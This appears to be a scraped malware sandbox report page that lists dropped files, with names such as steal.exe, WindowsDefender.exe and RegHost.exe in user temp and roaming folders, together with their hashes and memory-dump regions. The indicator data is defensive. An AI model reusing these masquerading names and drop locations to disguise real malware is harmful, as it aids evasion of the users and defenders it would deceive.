1109aa9a26c2baec61fba873e4e27bbc4871e88366301dc32b7fd7383ea83da6d32ab8173db66c211b1ef3e334e1427370da19d77da8b804a71118bdbe35a1e0

Download Submit
\Program Files\Google\Chrome\Application\launcher.exe
MD5
b555ce6924de8b22121d29a6a153d3fa

SHA1
49e5a197e7e4e5bded33820a55ab664c370c9794

SHA256
0c6a37537be50d03c4c7d7fb1d64e881a2c363185712a1c0e1e2c86f2faf3f19

SHA512
1109aa9a26c2baec61fba873e4e27bbc4871e88366301dc32b7fd7383ea83da6d32ab8173db66c211b1ef3e334e1427370da19d77da8b804a71118bdbe35a1e0

Download Submit
\Program Files\Google\Chrome\Application\launcher.exe
MD5
b555ce6924de8b22121d29a6a153d3fa

SHA1
49e5a197e7e4e5bded33820a55ab664c370c9794

SHA256
0c6a37537be50d03c4c7d7fb1d64e881a2c363185712a1c0e1e2c86f2faf3f19

SHA512
1109aa9a26c2baec61fba873e4e27bbc4871e88366301dc32b7fd7383ea83da6d32ab8173db66c211b1ef3e334e1427370da19d77da8b804a71118bdbe35a1e0

Download Submit
\Program Files\Google\Chrome\Application\launcher.exe
MD5
b555ce6924de8b22121d29a6a153d3fa

SHA1
49e5a197e7e4e5bded33820a55ab664c370c9794

SHA256
0c6a37537be50d03c4c7d7fb1d64e881a2c363185712a1c0e1e2c86f2faf3f19

SHA512
1109aa9a26c2baec61fba873e4e27bbc4871e88366301dc32b7fd7383ea83da6d32ab8173db66c211b1ef3e334e1427370da19d77da8b804a71118bdbe35a1e0

Download Submit
\Users\Admin\AppData\Local\Temp\123.exe
MD5
f18bb590bdf69d8571ad7da70faa921b

SHA1
47f58cf547153e5fc89165fbd83b118c51793569

SHA256
0d276de3a1e7ef5de4f770d84735afacbc771c35118d46e1cecb49d1eedaec69

SHA512
fd2052b58297a2a2aa8ebd2a7d85f0abfff7db7fa601c3cebd29198e085e14aeda2615de3a8104112f038c975e1329c1bd4d5542d89bc136eb222e1955933817

Download Submit
\Users\Admin\AppData\Local\Temp\123.exe
MD5
f18bb590bdf69d8571ad7da70faa921b

SHA1
47f58cf547153e5fc89165fbd83b118c51793569

SHA256
0d276de3a1e7ef5de4f770d84735afacbc771c35118d46e1cecb49d1eedaec69

SHA512
fd2052b58297a2a2aa8ebd2a7d85f0abfff7db7fa601c3cebd29198e085e14aeda2615de3a8104112f038c975e1329c1bd4d5542d89bc136eb222e1955933817

Download Submit
\Users\Admin\AppData\Local\Temp\123.exe
MD5
f18bb590bdf69d8571ad7da70faa921b

SHA1
47f58cf547153e5fc89165fbd83b118c51793569

SHA256
0d276de3a1e7ef5de4f770d84735afacbc771c35118d46e1cecb49d1eedaec69

SHA512
fd2052b58297a2a2aa8ebd2a7d85f0abfff7db7fa601c3cebd29198e085e14aeda2615de3a8104112f038c975e1329c1bd4d5542d89bc136eb222e1955933817

Download Submit
\Users\Admin\AppData\Local\Temp\WindowsDefender.exe
MD5
2536bc6692a942d2e87f45877aa1f54e

SHA1
c5a910052ce3facd0fc2d4b8725f88c8a86687b6

SHA256
e0551a15e4da35e27732aaad3c9b2a80f82c020067d1e5c7c3de9c91abe62fa0

SHA512
e705606e9bcc6efa79718798d5451131229577b2a7bdc2f18792cd8d388e286fcdda10c461ff2d1cd71759042828e0b5bda0b8cbdd8e68622534e9aff2bd83ab

Download Submit
\Users\Admin\AppData\Local\Temp\steal.exe
MD5
231147ca2fbb27db182411c726d9489e

SHA1
540fac37b19f2361973f3771a9ce4453dd1d370f

SHA256
9bee06359c7817269767dc482760caeb14644b9607bce3231bf6d1760342fb28

SHA512
a5c0b320f292fd60c4556cf3c04d399cc17ce941dbee9aabc4b03d7f396a9a59c7212e818220f641223161605f73bf0d28010ea0bc1ed7e4306c1ef983dd7691

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
f18bb590bdf69d8571ad7da70faa921b

SHA1
47f58cf547153e5fc89165fbd83b118c51793569

SHA256
0d276de3a1e7ef5de4f770d84735afacbc771c35118d46e1cecb49d1eedaec69

SHA512
fd2052b58297a2a2aa8ebd2a7d85f0abfff7db7fa601c3cebd29198e085e14aeda2615de3a8104112f038c975e1329c1bd4d5542d89bc136eb222e1955933817

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
f18bb590bdf69d8571ad7da70faa921b

SHA1
47f58cf547153e5fc89165fbd83b118c51793569

SHA256
0d276de3a1e7ef5de4f770d84735afacbc771c35118d46e1cecb49d1eedaec69

SHA512
fd2052b58297a2a2aa8ebd2a7d85f0abfff7db7fa601c3cebd29198e085e14aeda2615de3a8104112f038c975e1329c1bd4d5542d89bc136eb222e1955933817

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
f18bb590bdf69d8571ad7da70faa921b

SHA1
47f58cf547153e5fc89165fbd83b118c51793569

SHA256
0d276de3a1e7ef5de4f770d84735afacbc771c35118d46e1cecb49d1eedaec69

SHA512
fd2052b58297a2a2aa8ebd2a7d85f0abfff7db7fa601c3cebd29198e085e14aeda2615de3a8104112f038c975e1329c1bd4d5542d89bc136eb222e1955933817

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
f18bb590bdf69d8571ad7da70faa921b

SHA1
47f58cf547153e5fc89165fbd83b118c51793569

SHA256
0d276de3a1e7ef5de4f770d84735afacbc771c35118d46e1cecb49d1eedaec69

SHA512
fd2052b58297a2a2aa8ebd2a7d85f0abfff7db7fa601c3cebd29198e085e14aeda2615de3a8104112f038c975e1329c1bd4d5542d89bc136eb222e1955933817

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
f18bb590bdf69d8571ad7da70faa921b

SHA1
47f58cf547153e5fc89165fbd83b118c51793569

SHA256
0d276de3a1e7ef5de4f770d84735afacbc771c35118d46e1cecb49d1eedaec69

SHA512
fd2052b58297a2a2aa8ebd2a7d85f0abfff7db7fa601c3cebd29198e085e14aeda2615de3a8104112f038c975e1329c1bd4d5542d89bc136eb222e1955933817

Download Submit
memory/472-60-0x0000000000FF0000-0x0000000000FF1000-memory.dmp

Filesize
4KB

Download
memory/472-58-0x00000000010B0000-0x0000000001218000-memory.dmp

Filesize
1.4MB

Download
memory/564-121-0x000000013F160000-0x000000013FA64000-memory.dmp

Filesize
9.0MB

Download
memory/564-120-0x000000013F160000-0x000000013FA64000-memory.dmp

Filesize
9.0MB

Download
memory/564-123-0x000000013F160000-0x000000013FA64000-memory.dmp

Filesize
9.0MB

Download
memory/672-67-0x000000013FC80000-0x0000000140584000-memory.dmp

Filesize
9.0MB

Download
memory/672-66-0x000000013FC80000-0x0000000140584000-memory.dmp

Filesize
9.0MB

Download
memory/672-65-0x000000013FC80000-0x0000000140584000-memory.dmp

Filesize
9.0MB

Download
memory/1076-79-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/1076-76-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/1076-77-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/1076-78-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/1076-84-0x000007FEFC081000-0x000007FEFC083000-memory.dmp

Filesize
8KB

Download
memory/1076-81-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/1076-82-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/1076-80-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/1076-74-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/1076-75-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/1076-83-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/1132-122-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/1260-54-0x0000000075D61000-0x0000000075D63000-memory.dmp

Filesize
8KB

Download
memory/1272-72-0x0000000140000000-0x000000014274C000-memory.dmp

Filesize
39.3MB

Download
memory/1272-69-0x0000000140000000-0x000000014274C000-memory.dmp

Filesize
39.3MB

Download
memory/1272-71-0x0000000140000000-0x000000014274C000-memory.dmp

Filesize
39.3MB

Download
memory/1272-73-0x0000000140000000-0x000000014274C000-memory.dmp

Filesize
39.3MB

Download
memory/1300-119-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/1364-138-0x00000000025B0000-0x00000000031FA000-memory.dmp

Filesize
12.3MB

Download
memory/1364-142-0x00000000025B0000-0x00000000031FA000-memory.dmp

Filesize
12.3MB

Download
memory/1580-145-0x000000013FA20000-0x0000000140324000-memory.dmp

Filesize
9.0MB

Download
memory/1580-143-0x000000013FA20000-0x0000000140324000-memory.dmp

Filesize
9.0MB

Download
memory/1580-144-0x000000013FA20000-0x0000000140324000-memory.dmp

Filesize
9.0MB

Download
memory/1668-106-0x0000000000400000-0x000000000046C000-memory.dmp

Filesize
432KB

Download
memory/1668-105-0x0000000000400000-0x000000000046C000-memory.dmp

Filesize
432KB

Download
memory/1668-103-0x0000000000400000-0x000000000046C000-memory.dmp

Filesize
432KB

Download
memory/1668-102-0x0000000000400000-0x000000000046C000-memory.dmp

Filesize
432KB

Download
memory/1668-104-0x0000000000400000-0x000000000046C000-memory.dmp

Filesize
432KB

Download
memory/1668-108-0x0000000000400000-0x000000000046C000-memory.dmp

Filesize
432KB

Download
memory/1668-109-0x0000000004F80000-0x0000000004F81000-memory.dmp

Filesize
4KB

Download
memory/1876-91-0x000000013F900000-0x0000000140204000-memory.dmp

Filesize
9.0MB

Download
memory/1876-90-0x000000013F900000-0x0000000140204000-memory.dmp

Filesize
9.0MB

Download
memory/1876-89-0x000000013F900000-0x0000000140204000-memory.dmp

Filesize
9.0MB

Download